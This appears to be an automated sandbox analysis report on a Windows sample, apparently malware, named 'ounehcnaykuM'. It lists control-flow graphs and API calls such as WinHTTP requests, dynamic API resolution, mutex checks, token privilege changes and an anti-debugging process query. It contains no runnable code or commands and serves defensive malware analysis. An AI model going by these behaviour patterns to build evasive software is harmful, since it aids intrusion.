                  execution_graph 8781 1ed580 8783 1ed590 8781->8783 8784 1ed5c4 8783->8784 8787 1e7270 memset WinHttpCrackUrl 8783->8787 8785 1ed5d3 8784->8785 8815 1ebc60 8784->8815 8788 1e7524 8787->8788 8789 1e72c5 8787->8789 8788->8783 8789->8788 8818 1f1f60 8789->8818 8791 1e72e0 8791->8788 8792 1f1f60 10 API calls 8791->8792 8793 1e72fd 8792->8793 8812 1e74bd 8793->8812 8838 1e91c0 8793->8838 8794 1ebc60 HeapFree 8795 1e74fd 8794->8795 8796 1ebc60 HeapFree 8795->8796 8799 1e750a 8795->8799 8796->8799 8797 1e7518 8797->8783 8799->8797 8800 1ebc60 HeapFree 8799->8800 8800->8797 8801 1e733c WinHttpOpen 8802 1e7361 WinHttpSetTimeouts WinHttpConnect 8801->8802 8801->8812 8803 1e739d 8802->8803 8802->8812 8804 1e91c0 2 API calls 8803->8804 8806 1e73ab 8804->8806 8805 1e73ea WinHttpOpenRequest 8807 1e73fb WinHttpSendRequest 8805->8807 8805->8812 8806->8805 8806->8812 8808 1e7416 WinHttpReceiveResponse 8807->8808 8807->8812 8809 1e7427 WinHttpQueryHeaders 8808->8809 8808->8812 8810 1e744e 8809->8810 8809->8812 8811 1e7460 WinHttpQueryDataAvailable 8810->8811 8810->8812 8813 1f1f60 10 API calls 8810->8813 8814 1e74a3 WinHttpReadData 8810->8814 8811->8810 8811->8812 8812->8794 8813->8810 8814->8810 8814->8812 8816 1ebc79 8815->8816 8817 1ebc6a HeapFree 8815->8817 8816->8785 8817->8816 8819 1f1f75 8818->8819 8820 1f2020 8818->8820 8841 1e6d80 8819->8841 8821 1f203b RtlAllocateHeap 8820->8821 8822 1f2027 RtlReAllocateHeap 8820->8822 8821->8791 8822->8791 8825 1e6d80 2 API calls 8826 1f1f9a GetProcAddress 8825->8826 8827 1f1fbb 8826->8827 8828 1f1fb3 8826->8828 8829 1e6d80 2 API calls 8827->8829 8828->8791 8830 1f1fc6 GetProcAddress 8829->8830 8830->8828 8831 1f1fd9 8830->8831 8832 1e6d80 2 API calls 8831->8832 8833 1f1fe4 GetProcAddress 8832->8833 8833->8828 8834 1f1ff7 8833->8834 8835 1e6d80 2 API calls 8834->8835 8836 1f2002 GetProcAddress 8835->8836 8836->8828 8837 1f2015 GetProcessHeap 8836->8837 8837->8820 8839 1f14a0 2 API calls 8838->8839 8840 1e91d9 8839->8840 8840->8801 8844 1f14a0 8841->8844 8847 1e5140 8844->8847 8848 1e5160 8847->8848 8849 1e52a8 LoadLibraryA 8847->8849 8848->8849 8850 1e522c 8848->8850 8851 1e5216 memset 8848->8851 8849->8825 8850->8849 8852 1e5292 memcpy 8850->8852 8851->8850 8852->8849 8779 1f3543 __wgetmainargs 8780 1e9640 SetUnhandledExceptionFilter

                  Executed Functions

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 1efe30-1efe56 call 1e3eb0 3 1efe60-1efe85 Sleep 0->3 5 1efe87-1eff19 SetCurrentDirectoryW srand call 1eeda0 call 1ebc10 3->5 14 1eff1f-1eff29 call 1e35e0 5->14 15 1f05f5-1f05fb 5->15 21 1eff3d-1eff53 GetCurrentProcess IsWow64Process 14->21 22 1eff2b-1eff38 call 1f2bc0 call 1ecab0 14->22 17 1f0601-1f064b call 1e8030 call 1f1f60 15->17 18 1f06fb-1f0706 call 1e95a0 call 1e7e10 ExitProcess 15->18 43 1f064d-1f0657 17->43 44 1f06a5-1f06f9 call 1ebc60 17->44 26 1eff68-1eff7e call 1f2f00 ??2@YAPAXI@Z 21->26 27 1eff55-1eff60 call 1eea40 21->27 22->15 41 1eff80-1eff82 call 1eeac0 26->41 42 1eff8b 26->42 36 1eff65 27->36 36->26 49 1eff87-1eff89 41->49 45 1eff8d-1eff8f call 1e3e30 42->45 47 1f0660-1f0668 43->47 44->18 52 1eff94-1eff96 45->52 50 1f0680-1f0682 47->50 51 1f066a-1f0670 47->51 49->45 54 1f068c-1f0693 50->54 55 1f0684-1f0687 50->55 51->50 56 1f0672-1f067c 51->56 57 1effa5-1effa7 52->57 58 1eff98-1effa0 call 1ecab0 52->58 62 1f06a3 54->62 63 1f0695-1f06a0 54->63 55->54 56->47 60 1f067e 56->60 64 1effb9-1f000e call 1e1b70 call 1ebc50 ??2@YAPAXI@Z 57->64 65 1effa9-1effb6 call 1e2500 ??3@YAXPAX@Z 57->65 58->15 60->55 62->44 63->62 77 1f001f 64->77 78 1f0010-1f001d call 1e7150 64->78 65->64 80 1f0025-1f0072 call 1e91c0 call 1ef7d0 call 1e1f50 call 1e6a70 77->80 78->80 90 1f0094-1f00b4 call 1f0ce0 80->90 91 1f0074-1f008f call 1e1750 call 1efad0 call 1ecab0 80->91 90->91 97 1f00b6-1f00ff call 1e5780 90->97 91->15 104 1f0100-1f0111 97->104 105 1f0117-1f0132 call 1e95f0 104->105 106 1f05c0-1f05d3 call 1f2ad0 104->106 111 1f014c-1f0175 _time64 105->111 112 1f0134-1f0147 105->112 106->104 113 1f01e3-1f01fe call 1f1d50 111->113 114 1f0177 111->114 119 1f05a4-1f05ba 112->119 122 1f022d-1f0246 113->122 123 1f0200-1f0203 113->123 116 1f0179-1f017e 114->116 117 1f0180-1f0199 call 1eda20 114->117 116->113 116->117 129 1f01c7-1f01df 117->129 130 1f019b-1f019e 117->130 119->105 119->106 125 1f0248 122->125 126 1f0275-1f0290 call 1e4380 call 1f14c0 122->126 127 1f0205-1f0212 call 1ec980 123->127 128 1f0215-1f0228 123->128 133 1f024a-1f024f 125->133 134 1f0251-1f0269 call 1eadb0 125->134 149 1f02c5 126->149 150 1f0292-1f02c3 call 1e91c0 * 2 126->150 127->128 128->119 129->113 131 1f01a0-1f01ad call 1ec980 130->131 132 1f01b0-1f01c2 130->132 131->132 147 1f05a2 132->147 133->126 133->134 134->119 146 1f026f-1f0272 134->146 146->126 147->119 151 1f02c7-1f02f8 call 1e91c0 * 2 149->151 152 1f02fa-1f032a call 1e91c0 * 2 149->152 164 1f032b-1f0333 call 1e5a90 150->164 151->164 152->164 168 1f0336-1f034d _time64 164->168 169 1f034f-1f035c 168->169 170 1f0367-1f0398 call 1e37c0 168->170 172 1f035e 169->172 173 1f039f-1f03ac 169->173 170->173 178 1f039a 170->178 172->170 175 1f0360-1f0365 172->175 176 1f0407-1f0410 173->176 177 1f03ae 173->177 175->170 175->173 179 1f0416 176->179 180 1f04c3-1f04d0 call 1e99a0 176->180 181 1f03b0-1f03b5 177->181 182 1f03b7-1f03d4 177->182 178->173 184 1f0424-1f043e call 1ef550 call 1e9ab0 179->184 185 1f0418-1f041e 179->185 180->147 192 1f04d6-1f04e9 call 1e5a90 180->192 181->176 181->182 182->176 186 1f03d6 182->186 202 1f0440-1f0471 call 1e91c0 * 2 184->202 203 1f0473-1f04a3 call 1e91c0 * 2 184->203 185->180 185->184 189 1f03df-1f0401 call 1e2030 186->189 190 1f03d8-1f03dd 186->190 189->176 198 1f0574-1f058b call 1f0ce0 189->198 190->176 190->189 192->147 201 1f04ef-1f0500 call 1e7560 192->201 208 1f058d-1f0597 198->208 209 1f05d8-1f05f3 call 1e1750 call 1efad0 call 1ecab0 198->209 216 1f0506-1f050d 201->216 217 1f0599-1f05a0 201->217 222 1f04a4-1f04c0 call 1e5a90 call 1ebc60 _time64 202->222 203->222 208->147 209->15 216->209 220 1f0513-1f051f 216->220 217->147 217->209 224 1f0521-1f052e 220->224 225 1f0530-1f0535 220->225 222->180 227 1f0537-1f053b 224->227 225->227 228 1f0540-1f0548 225->228 227->228 232 1f0562-1f056c 228->232 233 1f054a-1f0560 228->233 232->168 235 1f0572 232->235 233->228 233->232 235->147
                  APIs
                    • Part of subcall function 001E3EB0: ??2@YAPAXI@Z.MSVCRT ref: 001E3EB7
                    • Part of subcall function 001E3EB0: memset.MSVCRT ref: 001E3ECD
                  • Sleep.KERNELBASE(00000001), ref: 001EFE80
                  • SetCurrentDirectoryW.KERNELBASE(?), ref: 001EFEF3
                  • srand.MSVCRT ref: 001EFF04
                    • Part of subcall function 001EEDA0: LoadLibraryW.KERNEL32(?), ref: 001EEDF2
                    • Part of subcall function 001EEDA0: LoadLibraryW.KERNEL32(?), ref: 001EEE19
                    • Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEE47
                    • Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEE6F
                    • Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEE97
                    • Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEEBF
                    • Part of subcall function 001EEDA0: GetProcAddress.KERNEL32(00000000,?), ref: 001EEEE7
                    • Part of subcall function 001EBC10: CoInitializeEx.OLE32(00000000,00000000), ref: 001EBC14
                    • Part of subcall function 001EBC10: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 001EBC33
                  • GetCurrentProcess.KERNEL32(?), ref: 001EFF44
                  • IsWow64Process.KERNELBASE(00000000), ref: 001EFF4B
                  • ??2@YAPAXI@Z.MSVCRT ref: 001EFF74
                    • Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E6386
                    • Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E639E
                    • Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E64AC
                    • Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E64B2
                    • Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E64B8
                    • Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E64F9
                    • Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E6517
                    • Part of subcall function 001E3E30: VariantInit.OLEAUT32(?), ref: 001E6538
                    • Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E660F
                    • Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E6618
                    • Part of subcall function 001E3E30: VariantClear.OLEAUT32(?), ref: 001E661E
                  • ??3@YAXPAX@Z.MSVCRT ref: 001EFFB1
                    • Part of subcall function 001E1B70: memset.MSVCRT ref: 001E1BA3
                    • Part of subcall function 001E1B70: memset.MSVCRT ref: 001E1BB2
                    • Part of subcall function 001E1B70: ??2@YAPAXI@Z.MSVCRT ref: 001E1BC9
                    • Part of subcall function 001E1B70: ??2@YAPAXI@Z.MSVCRT ref: 001E1BE8
                  • ??2@YAPAXI@Z.MSVCRT ref: 001F0004
                    • Part of subcall function 001E1F50: memcpy.MSVCRT ref: 001E1FEC
                    • Part of subcall function 001E6A70: ??2@YAPAXI@Z.MSVCRT ref: 001E6A86
                    • Part of subcall function 001E6A70: ??2@YAPAXI@Z.MSVCRT ref: 001E6AA1
                    • Part of subcall function 001E6A70: ??3@YAXPAX@Z.MSVCRT ref: 001E6BB0
                    • Part of subcall function 001E6A70: ??3@YAXPAX@Z.MSVCRT ref: 001E6BDE
                    • Part of subcall function 001E6A70: ??3@YAXPAX@Z.MSVCRT ref: 001E6C48
                    • Part of subcall function 001E6A70: ??3@YAXPAX@Z.MSVCRT ref: 001E6CA1
                    • Part of subcall function 001EFAD0: ??3@YAXPAX@Z.MSVCRT ref: 001EFB8D
                    • Part of subcall function 001EFAD0: ??3@YAXPAX@Z.MSVCRT ref: 001EFBA4
                    • Part of subcall function 001E5780: ??2@YAPAXI@Z.MSVCRT ref: 001E57D5
                    • Part of subcall function 001E5780: ??3@YAXPAX@Z.MSVCRT ref: 001E582F
                  • _time64.MSVCRT ref: 001F014D
                    • Part of subcall function 001EDA20: ??2@YAPAXI@Z.MSVCRT ref: 001EDA7A
                    • Part of subcall function 001EDA20: ??3@YAXPAX@Z.MSVCRT ref: 001EDAB9
                    • Part of subcall function 001EDA20: _time64.MSVCRT ref: 001EDADB
                    • Part of subcall function 001EDA20: ??3@YAXPAX@Z.MSVCRT ref: 001EDB0B
                    • Part of subcall function 001F1D50: ??2@YAPAXI@Z.MSVCRT ref: 001F1D7F
                    • Part of subcall function 001F1D50: ??3@YAXPAX@Z.MSVCRT ref: 001F1DBE
                    • Part of subcall function 001F1D50: _time64.MSVCRT ref: 001F1DE0
                    • Part of subcall function 001F1D50: ??3@YAXPAX@Z.MSVCRT ref: 001F1E0D
                  • _time64.MSVCRT ref: 001F04B4
                    • Part of subcall function 001EC980: _itow.MSVCRT ref: 001EC999
                    • Part of subcall function 001EADB0: ??3@YAXPAX@Z.MSVCRT ref: 001EADEF
                    • Part of subcall function 001EADB0: ??3@YAXPAX@Z.MSVCRT ref: 001EAF9A
                    • Part of subcall function 001F14C0: WSAStartup.WS2_32(00000202,?), ref: 001F14E2
                    • Part of subcall function 001F14C0: gethostname.WS2_32(?,000000FF), ref: 001F1502
                    • Part of subcall function 001F14C0: getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 001F1522
                    • Part of subcall function 001F14C0: freeaddrinfo.WS2_32(00000000), ref: 001F1580
                    • Part of subcall function 001F14C0: WSACleanup.WS2_32 ref: 001F1586
                    • Part of subcall function 001E5A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001F00C1), ref: 001E5B3F
                  • _time64.MSVCRT ref: 001F0338
                    • Part of subcall function 001E37C0: memcpy.MSVCRT ref: 001E3CA0
                    • Part of subcall function 001E2030: ??2@YAPAXI@Z.MSVCRT ref: 001E207A
                    • Part of subcall function 001E2030: ??3@YAXPAX@Z.MSVCRT ref: 001E2176
                    • Part of subcall function 001E2030: _time64.MSVCRT ref: 001E21A8
                    • Part of subcall function 001E2030: ??3@YAXPAX@Z.MSVCRT ref: 001E21CF
                    • Part of subcall function 001E9AB0: WSAStartup.WS2_32(00000202,?), ref: 001E9ADA
                    • Part of subcall function 001E9AB0: freeaddrinfo.WS2_32(00000000,001F043A), ref: 001E9B3B
                    • Part of subcall function 001E9AB0: getaddrinfo.WS2_32(001F043A,00000000,?,00000000), ref: 001E9BD6
                    • Part of subcall function 001E9AB0: freeaddrinfo.WS2_32(00000000), ref: 001E9C1E
                    • Part of subcall function 001E9AB0: WSACleanup.WS2_32 ref: 001E9C44
                    • Part of subcall function 001F2AD0: ??2@YAPAXI@Z.MSVCRT ref: 001F2ADD
                    • Part of subcall function 001F2AD0: ??3@YAXPAX@Z.MSVCRT ref: 001F2B54
                    • Part of subcall function 001F2AD0: _time64.MSVCRT ref: 001F2B82
                    • Part of subcall function 001F2AD0: ??3@YAXPAX@Z.MSVCRT ref: 001F2BAA
                    • Part of subcall function 001EEAC0: CoCreateInstance.OLE32(001F708C,00000000,00000001,001F6E7C,00000004,001F8880,000003E7,001EFF87), ref: 001EEB17
                    • Part of subcall function 001F2BC0: ??2@YAPAXI@Z.MSVCRT ref: 001F2C56
                    • Part of subcall function 001F2BC0: ??2@YAPAXI@Z.MSVCRT ref: 001F2C90
                    • Part of subcall function 001F2BC0: ??2@YAPAXI@Z.MSVCRT ref: 001F2CDB
                    • Part of subcall function 001F2BC0: ??3@YAXPAX@Z.MSVCRT ref: 001F2D75
                    • Part of subcall function 001F2BC0: ??3@YAXPAX@Z.MSVCRT ref: 001F2D8A
                    • Part of subcall function 001F2BC0: ??3@YAXPAX@Z.MSVCRT ref: 001F2D9E
                  • ExitProcess.KERNEL32 ref: 001F0706
                    • Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                    • Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                    • Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
                    • Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                    • Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                    • Part of subcall function 001E35E0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,00000000,00000000,001F8880,000003E7), ref: 001E3622
                    • Part of subcall function 001E35E0: CreateMutexW.KERNELBASE(?,00000001,?), ref: 001E366B
                    • Part of subcall function 001E35E0: ExitProcess.KERNEL32 ref: 001E368E
                    • Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73
                    • Part of subcall function 001E95A0: FreeLibrary.KERNELBASE(00000000,001F0700), ref: 001E95D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  APIs
                  • LoadLibraryW.KERNEL32(?), ref: 001EEDF2
                  • LoadLibraryW.KERNEL32(?), ref: 001EEE19
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001EEE47
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001EEE6F
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001EEE97
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001EEEBF
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001EEEE7
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001EEF0F
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001EEF37
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001EEF5B
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001EEF7F
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001EEFA3
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  APIs
                  • LoadLibraryA.KERNEL32(?), ref: 001F1F87
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
                  • GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
                  • GetProcessHeap.KERNEL32 ref: 001F2015
                  • RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
                  • RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 527 415d50-415dc5 call 4158c5 530 415e06-415e2b GetCurrentProcess call 4158c5 527->530 531 415dc7-415dd1 527->531 539 415e37-415e62 call 4158c5 530->539 540 415e2d 530->540 533 415ddf-415dfa call 4158c5 531->533 534 415dd3 531->534 533->530 541 415dfc 533->541 537 4163c0-4163c5 534->537 544 415e6b-415e75 539->544 540->537 541->537 545 415e7b-415e95 544->545 546 415f4a-415f56 544->546 549 415ea9-415eb6 545->549 550 415e97-415ea7 545->550 547 41608a-4160a8 call 4158c5 546->547 548 415f5c-415f7a call 4158c5 546->548 558 4161de-4161f5 547->558 559 4160ae-4160b4 547->559 548->547 560 415f80-415f86 548->560 552 415eb9-415eec call 4158c5 549->552 550->552 561 415ef8-415f18 call 4158c5 552->561 562 415eee 552->562 570 41630b 558->570 571 4161fb-41620d 558->571 564 4160e6-416101 559->564 565 4160b6-4160bd 559->565 560->547 566 415f8c-415fb0 560->566 585 415f45 561->585 586 415f1a-415f42 call 4158c5 561->586 562->537 568 416103 564->568 569 416105-416125 call 4158c5 LoadLibraryA 564->569 565->564 572 4160bf-4160c6 565->572 573 415fb3-415fbf 566->573 568->559 608 416131-41614e call 4158c5 569->608 609 416127 569->609 581 416312-416328 call 4158c5 570->581 578 41620f-416221 571->578 579 41626f-416281 571->579 572->564 580 4160c8-4160cf 572->580 576 416079-416085 573->576 577 415fc5-415fd1 573->577 576->560 590 415fd3-41600e call 4158c5 577->590 591 416010-41601c 577->591 587 416249-41625b 578->587 588 416223-416235 578->588 583 416283-416295 579->583 584 4162a9-4162bb 579->584 580->564 589 4160d1-4160d7 580->589 615 41632a 581->615 616 416334-41633b 581->616 602 416297-41629e 583->602 603 4162a0 583->603 595 4162c6 584->595 596 4162bd-4162c4 584->596 585->544 586->585 605 41625d-416264 587->605 606 416266 587->606 598 416237-41623e 588->598 599 416240 588->599 589->564 600 4160d9-4160e0 589->600 593 41606c-416074 590->593 591->593 594 41601e-416069 call 4158c5 591->594 593->573 594->593 611 4162cd-4162fa call 4158c5 595->611 596->611 612 416247 598->612 599->612 600->558 600->564 610 4162a7 602->610 603->610 613 41626d 605->613 606->613 626 416151-416157 608->626 609->537 610->611 632 416306 611->632 633 4162fc 611->633 612->613 613->611 615->537 623 41633d-416350 NtQueryInformationProcess 616->623 624 416353-41635a 616->624 623->624 624->581 625 41635c-416360 624->625 630 416362 625->630 631 416366-4163b6 call 4158c5 call 1ed796 625->631 628 416159-416163 626->628 629 4161d0-4161d9 626->629 635 41617e-4161a1 call 4158c5 GetProcAddress 628->635 636 416165-41617c GetProcAddress 628->636 629->559 630->537 643 4163b9 631->643 632->570 633->537 639 4161a4-4161a8 635->639 636->639 641 4161b4-4161ce 639->641 642 4161aa 639->642 641->626 642->537 643->537
                  APIs
                  • GetCurrentProcess.KERNEL32(?,00000040), ref: 00415E06
                  • LoadLibraryA.KERNEL32(00000000), ref: 00416118
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,00000004,?,00000040), ref: 00416173
                  • GetProcAddress.KERNEL32(00000000,00000002,00000000,00000000,?,?,?,?,?,00000004,?,00000040), ref: 0041619B
                  • NtQueryInformationProcess.NTDLL(?,00000000,00000000,00000018,00000000), ref: 0041634A
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10396226677.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_400000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 998 1f3130-1f3150 1000 1f3159-1f3196 AdjustTokenPrivileges 998->1000 1001 1f3152-1f3158 998->1001 1000->1001 1002 1f3198-1f31b3 1000->1002
                  APIs
                  • AdjustTokenPrivileges.KERNELBASE(001E81FD,00000000,?,00000010,00000000,00000000), ref: 001F3192
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 001E6E5D
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • CoCreateInstance.OLE32(001F708C,00000000,00000001,001F6E7C,00000004,001F8880,000003E7,001EFF87), ref: 001EEB17
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_0000BC7B), ref: 001E9645
                  Memory Dump Source
                  • Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true
                  • Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
                  • Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
                  • Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
                  • Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 285 1e3e30-1e3e34 286 1e3e36 285->286 287 1e3e3b 285->287 288 1e6260-1e62f6 286->288 287->288 290 1e662e-1e6633 288->290 291 1e62fc-1e630f 288->291 292 1e6635-1e6638 290->292 293 1e663d-1e6642 290->293 291->290 297 1e6315-1e6335 call 1e8030 call 1e33a0 291->297 292->293 295 1e6644-1e6649 293->295 296 1e664c-1e6651 293->296 295->296 298 1e6653-1e6659 call 1ebc60 296->298 299 1e665c-1e6665 296->299 306 1e6337-1e6342 call 1f27b0 297->306 307 1e6347-1e6357 call 1e5c50 297->307 298->299 306->290 307->290 312 1e635d-1e63f1 call 1e91c0 * 2 VariantInit * 2 call 1f24c0 call 1e13a0 307->312 321 1e63f3-1e63f8 312->321 322 1e63fa 312->322 323 1e6401-1e6414 call 1e13a0 321->323 322->323 326 1e6416-1e641b 323->326 327 1e641d 323->327 328 1e6424-1e64bc call 1e7cf0 * 2 VariantClear * 3 326->328 327->328 334 1e6622 call 1e6e00 328->334 335 1e64c2-1e64c8 328->335 339 1e6627-1e6629 334->339 335->290 336 1e64ce-1e64de call 1e5c50 335->336 336->290 342 1e64e4-1e655f call 1e91c0 VariantInit * 3 call 1e13a0 336->342 339->290 341 1e662b 339->341 341->290 347 1e6561-1e6566 342->347 348 1e6568 342->348 349 1e656f-1e6582 call 1e13a0 347->349 348->349 352 1e658b 349->352 353 1e6584-1e6589 349->353 354 1e6592-1e6620 call 1e7cf0 * 2 VariantClear * 3 352->354 353->354 354->290
                  APIs
                    • Part of subcall function 001E5C50: LookupAccountSidW.ADVAPI32(00000000,?,?,00000001,?,?,?), ref: 001E5CDB
                    • Part of subcall function 001E5C50: memcpy.MSVCRT ref: 001E5D81
                    • Part of subcall function 001E5C50: memcpy.MSVCRT ref: 001E5DA6
                    • Part of subcall function 001E5C50: _time64.MSVCRT ref: 001E5E4C
                    • Part of subcall function 001E5C50: _localtime64.MSVCRT ref: 001E5E5D
                    • Part of subcall function 001E5C50: wcsftime.MSVCRT ref: 001E5E87
                  • VariantInit.OLEAUT32(?), ref: 001E6386
                  • VariantInit.OLEAUT32(?), ref: 001E639E
                    • Part of subcall function 001F24C0: SysAllocString.OLEAUT32(001E63CA), ref: 001F24D3
                    • Part of subcall function 001E13A0: ??2@YAPAXI@Z.MSVCRT ref: 001E13A9
                    • Part of subcall function 001E13A0: SysAllocString.OLEAUT32(75CF3F3F), ref: 001E13CA
                    • Part of subcall function 001E7CF0: InterlockedDecrement.KERNEL32(?), ref: 001E7CFE
                    • Part of subcall function 001E7CF0: SysFreeString.OLEAUT32(00000000), ref: 001E7D13
                    • Part of subcall function 001E7CF0: ??_V@YAXPAX@Z.MSVCRT ref: 001E7D21
                    • Part of subcall function 001E7CF0: ??3@YAXPAX@Z.MSVCRT ref: 001E7D2A
                  • VariantClear.OLEAUT32(?), ref: 001E64AC
                  • VariantClear.OLEAUT32(?), ref: 001E64B2
                  • VariantClear.OLEAUT32(?), ref: 001E64B8
                  • VariantInit.OLEAUT32(?), ref: 001E64F9
                  • VariantInit.OLEAUT32(?), ref: 001E6517
                  • VariantInit.OLEAUT32(?), ref: 001E6538
                  • VariantClear.OLEAUT32(?), ref: 001E660F
                  • VariantClear.OLEAUT32(?), ref: 001E6618
                  • VariantClear.OLEAUT32(?), ref: 001E661E
                    • Part of subcall function 001E6E00: GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 001E6E5D
                    • Part of subcall function 001F27B0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000001,?,?,80000001,?,001E6342,?,?,?,?,001EFF94), ref: 001F282F
